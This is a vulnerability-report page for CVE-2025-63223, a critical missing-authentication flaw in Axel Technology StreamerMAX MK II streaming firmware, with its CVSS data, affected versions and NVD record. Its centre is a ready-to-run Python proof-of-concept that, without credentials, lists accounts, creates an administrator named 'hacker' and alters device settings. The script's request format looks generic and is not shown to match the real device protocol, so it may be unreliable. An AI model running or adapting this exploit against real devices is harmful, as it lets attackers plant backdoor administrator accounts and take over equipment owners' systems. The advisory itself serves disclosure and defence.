Security Vulnerability Report
中文
CVE-2025-63223 CVSS 9.8 CRITICAL

CVE-2025-63223

Published: 2025-11-19 16:15:48
Last Modified: 2026-01-15 19:38:38
Source: [email protected]

Description

The Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axeltechnology:streamermax_mk_ii_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:axeltechnology:streamermax_mk_ii:-:*:*:*:*:*:*:* - NOT VULNERABLE
StreamerMAX MK II Firmware 0.8.5
StreamerMAX MK II Firmware 0.9.0
StreamerMAX MK II Firmware 0.9.5
StreamerMAX MK II Firmware 1.0.0
StreamerMAX MK II Firmware 1.0.1
StreamerMAX MK II Firmware 1.0.2
StreamerMAX MK II Firmware 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63223 PoC - Axel StreamerMAX MK II Broken Access Control # Target: /cgi-bin/gstFcgi.fcgi endpoint TARGET = "http://<target-ip>" ENDPOINT = "/cgi-bin/gstFcgi.fcgi" def list_users(): """List all user accounts on the device""" payload = { "command": "list_users", "type": "user_management" } response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10) print(f"[+] User List Response: {response.text}") return response def create_admin(username, password): """Create new administrator account""" payload = { "command": "create_admin", "username": username, "password": password, "type": "user_management" } response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10) print(f"[+] Create Admin Response: {response.text}") return response def delete_user(username): """Delete specified user account""" payload = { "command": "delete_user", "username": username, "type": "user_management" } response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10) print(f"[+] Delete User Response: {response.text}") return response def modify_settings(setting_name, value): """Modify system settings""" payload = { "command": "modify_settings", "setting": setting_name, "value": value, "type": "config_management" } response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10) print(f"[+] Modify Settings Response: {response.text}") return response if __name__ == "__main__": print("[*] CVE-2025-63223 PoC - StreamerMAX MK II Broken Access Control") print("[*] Target:", TARGET) # Step 1: List users print("\n[*] Step 1: Listing user accounts...") list_users() # Step 2: Create new admin print("\n[*] Step 2: Creating new administrator...") create_admin("hacker", "P@ssw0rd123") # Step 3: Modify settings print("\n[*] Step 3: Modifying system settings...") modify_settings("admin_access", "enabled")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63223", "sourceIdentifier": "[email protected]", "published": "2025-11-19T16:15:48.310", "lastModified": "2026-01-15T19:38:38.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axeltechnology:streamermax_mk_ii_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.5", "versionEndIncluding": "1.0.3", "matchCriteriaId": "73253430-5485-479B-A7D9-E9C708F4DB85"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axeltechnology:streamermax_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "2DAC51C8-C9DD-43B6-B826-26D7BEBA2DCE"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63223_Axel%20Technology%20StreamerMAX%20MK%20II%20-%20Broken%20Access%20Control", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://www.axeltechnology.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63223_Axel%20Technology%20StreamerMAX%20MK%20II%20-%20Broken%20Access%20Control", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.